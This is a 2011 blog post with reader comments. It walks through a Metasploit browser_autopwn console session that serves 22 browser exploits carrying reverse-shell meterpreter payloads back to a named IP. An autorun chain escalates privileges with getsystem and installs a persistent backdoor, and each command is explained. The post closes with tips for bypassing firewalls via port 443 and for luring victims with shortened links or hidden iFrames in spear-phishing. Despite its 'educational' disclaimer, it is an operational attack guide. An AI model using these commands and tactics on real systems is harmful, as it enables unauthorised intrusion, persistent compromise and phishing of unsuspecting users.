Sunday 31 July 2011

Browser Autopwn and Post Exploitation Automation

Browser Autopwn and Post Exploitation Automation

In this post I simply show how you can leverage Metasploits Browser Autopwn feature and post-exploit automation to make your pwnage more efficient.

I will simply post a text-log for now of the console session... I will, at the bottom, show all the commands executed and explain why/what they do.

########

root@bt:~# msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.0.0-testing [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 360 auxiliary - 70 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
       =[ svn r13406 updated yesterday (2011.07.29)

msf > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf > use server/browser_autopwn
msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf  auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf  auxiliary(browser_autopwn) > set LHOST 140.203.213.173
LHOST => 140.203.213.173
msf  auxiliary(browser_autopwn) > show advanced

Module advanced options:

   Name           : AutoRunScript
   Current Setting:
   Description    : A script to automatically on session creation.

   Name           : AutoSystemInfo
   Current Setting: true
   Description    : Automatically capture system information on initialization.

   Name           : DEBUG
   Current Setting: false
   Description    : Do not obfuscate the javascript and print various bits of useful
      info to the browser

   Name           : EXCLUDE
   Current Setting:
   Description    : Only attempt to use exploits whose name DOES NOT match this
      regex

   Name           : InitialAutoRunScript
   Current Setting: migrate -f
   Description    : An initial script to run on session created (before
      AutoRunScript)

   Name           : LPORT_GENERIC
   Current Setting: 6666
   Description    : The port to use for generic reverse-connect payloads

   Name           : LPORT_JAVA
   Current Setting: 7777
   Description    : The port to use for Java reverse-connect payloads

   Name           : LPORT_LINUX
   Current Setting: 4444
   Description    : The port to use for Linux reverse-connect payloads

   Name           : LPORT_MACOS
   Current Setting: 5555
   Description    : The port to use for Mac reverse-connect payloads

   Name           : LPORT_WIN32
   Current Setting: 3333
   Description    : The port to use for Windows reverse-connect payloads

   Name           : ListenerComm
   Current Setting:
   Description    : The specific communication channel to use for this service

   Name           : MATCH
   Current Setting:
   Description    : Only attempt to use exploits whose name matches this regex

   Name           : PAYLOAD_GENERIC
   Current Setting: generic/shell_reverse_tcp
   Description    : The payload to use for generic reverse-connect payloads6

   Name           : PAYLOAD_JAVA
   Current Setting: java/meterpreter/reverse_tcp
   Description    : The payload to use for Java reverse-connect payloads

   Name           : PAYLOAD_LINUX
   Current Setting: linux/meterpreter/reverse_tcp
   Description    : The payload to use for Linux reverse-connect payloads

   Name           : PAYLOAD_MACOS
   Current Setting: osx/meterpreter/reverse_tcp
   Description    : The payload to use for Mac reverse-connect payloads

   Name           : PAYLOAD_WIN32
   Current Setting: windows/meterpreter/reverse_tcp
   Description    : The payload to use for Windows reverse-connect payloads

   Name           : VERBOSE
   Current Setting: false
   Description    : Enable detailed status messages

   Name           : WORKSPACE
   Current Setting:
   Description    : Specify the workspace for this module


msf  auxiliary(browser_autopwn) > set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
autorunscript => use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173
msf  auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript 2011-07-31 16:46:01 +0100
msf  auxiliary(browser_autopwn) > [*] Done in 4.250804937 seconds

[*] Starting exploit modules on host 140.203.213.173...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/olNIWYBO
[*]  Local IP: http://140.203.213.173:80/olNIWYBO
[*] Server started.
[*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MJRGMyJeIZ
[*]  Local IP: http://140.203.213.173:80/MJRGMyJeIZ
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/tgeUOMS
[*]  Local IP: http://140.203.213.173:80/tgeUOMS
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/hHgo
[*]  Local IP: http://140.203.213.173:80/hHgo
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/vgsBT
[*]  Local IP: http://140.203.213.173:80/vgsBT
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/lBSv
[*]  Local IP: http://140.203.213.173:80/lBSv
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/WSwQ
[*]  Local IP: http://140.203.213.173:80/WSwQ
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/LaCtIRmKFgjC
[*]  Local IP: http://140.203.213.173:80/LaCtIRmKFgjC
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/YDmj
[*]  Local IP: http://140.203.213.173:80/YDmj
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/OhNdpjvw
[*]  Local IP: http://140.203.213.173:80/OhNdpjvw
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/gBDljyzASUIE
[*]  Local IP: http://140.203.213.173:80/gBDljyzASUIE
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uWVoWM
[*]  Local IP: http://140.203.213.173:80/uWVoWM
[*] Server started.
[*] Using URL: http://0.0.0.0:80/cCeAI
[*]  Local IP: http://140.203.213.173:80/cCeAI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oMMWLifmjN
[*]  Local IP: http://140.203.213.173:80/oMMWLifmjN
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/olsZbkWuHiC
[*]  Local IP: http://140.203.213.173:80/olsZbkWuHiC
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VJwjFpawhrII
[*]  Local IP: http://140.203.213.173:80/VJwjFpawhrII
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/vPSnVmSgq
[*]  Local IP: http://140.203.213.173:80/vPSnVmSgq
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KamK
[*]  Local IP: http://140.203.213.173:80/KamK
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kQfuNvwQvRfF
[*]  Local IP: http://140.203.213.173:80/kQfuNvwQvRfF
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/eJDSgMe
[*]  Local IP: http://140.203.213.173:80/eJDSgMe
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/yUgUbxfOz
[*]  Local IP: http://140.203.213.173:80/yUgUbxfOz
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/FJULEockuokO
[*]  Local IP: http://140.203.213.173:80/FJULEockuokO
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 140.203.213.173:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 140.203.213.173:6666
[*] Starting the payload handler...
[*] Started reverse handler on 140.203.213.173:7777
[*] Starting the payload handler...

[*] --- Done, found 22 exploit modules

[*] Using URL: http://0.0.0.0:80/Jg8bET0lG
[*]  Local IP: http://140.203.213.173:80/Jg8bET0lG
[*] Server started.

msf  auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

No active sessions.

msf  auxiliary(browser_autopwn) >

########

"setg payload windows/meterpreter/reverse_tcp"
> This command simply sets the global variable for payload as Windows Meterpreter where applicable.

"use server/browser_autopwn"
> This is to "use" the browser autopwn method

"show options"
> This shows options for the specific module

"set SRVPORT 80"
> Sets the variable SRVPORT to 80, meaning the port the targets must connect to is 80.

"set LHOST 140.203.213.173"
> Sets the IP address for back-connects to 140.203.213.173. Set this to your listener - normally the one started by metasploit, i.e. YOU.

"show advanced"
> Shows advanced options for the module

"set autorunscript use priv && getsystem && run persistence -U -i 5 -p 6666 -r 140.203.213.173"
> This is my own little mixin. It runs three commands one after another.
>> First, it loads the "priv" plugin, so it can prepare to escalate privilages on pwned systems.
>>> Next it runs getsystem whilch escalates privilages to SYSTEM
>>>> Finally, it sets Meterpreter as Persistant Post Reboot. I explain the flags below.
>>>>> -U means it runs the Meterpreter Persistant Backdoor on User Login
>>>>>> -i 5 means it sleeps 5 seconds between reconnect retries. I set this to a big number if theres an IDS.
>>>>>>> -p 6666 is the port to connect back to where a Multi/handler is listening
>>>>>>>> -r 140.203.213.173 is the IP to connect back to.

PROTIP: Set up Metasploit on a VPS and run multi/handler on 443 so the backdoors connect back to that. 443 is good for firewall bypassing.

"run"
> This command runs the module!

"sessions -l"
> this command lists created meterpreter/shell sessions

"sessions -i 1" (not used here)
> Interact with session 1. -i <number of session> means interact with session <number>.

Once you set it up, a nasty trick is to send the link (IP:Port of server) as a tinyurl encoded link to people, so they get pwned rather swiftly. Or embed the link as an iFrame with onload into a malicious website for spear phishing...

Have fun.

~For informational and educational purposes only, I am not responsible for your use of this infodox. Dont be malicious... Its mean!
Posted by at

3 comments:

  1. un blog de discusion y pensamiento24 February 2013 at 17:52

    I have a problem right now and I hope you can help me because I cant find any info on this.
    when the server gets started I get this:

    [*] --- Done, found 22 exploit modules
    [*] Using URL: http://0.0.0.0:80/Jg8bET0lG
    [*] Local IP: http://140.203.213.173:80/Jg8bET0lG
    [*] Server started.

    but the problem is that in the line Local IP, I get the loopback address and not the actual host's IP address. I tried a command "ifconfig lo down" and tried again but the same happens. I did one successful exploitation and after that one I couldn't do any other.
    any help will be more appreciated

    ReplyDelete
  2. Saul xavier8 June 2016 at 06:20

    How would one redirect the link to say Google, plus how can I upload/exec a payload without psexec

    ReplyDelete
  3. Saul xavier8 June 2016 at 06:20

    How would one redirect the link to say Google, plus how can I upload/exec a payload without psexec

    ReplyDelete

Subscribe to: Post Comments (Atom)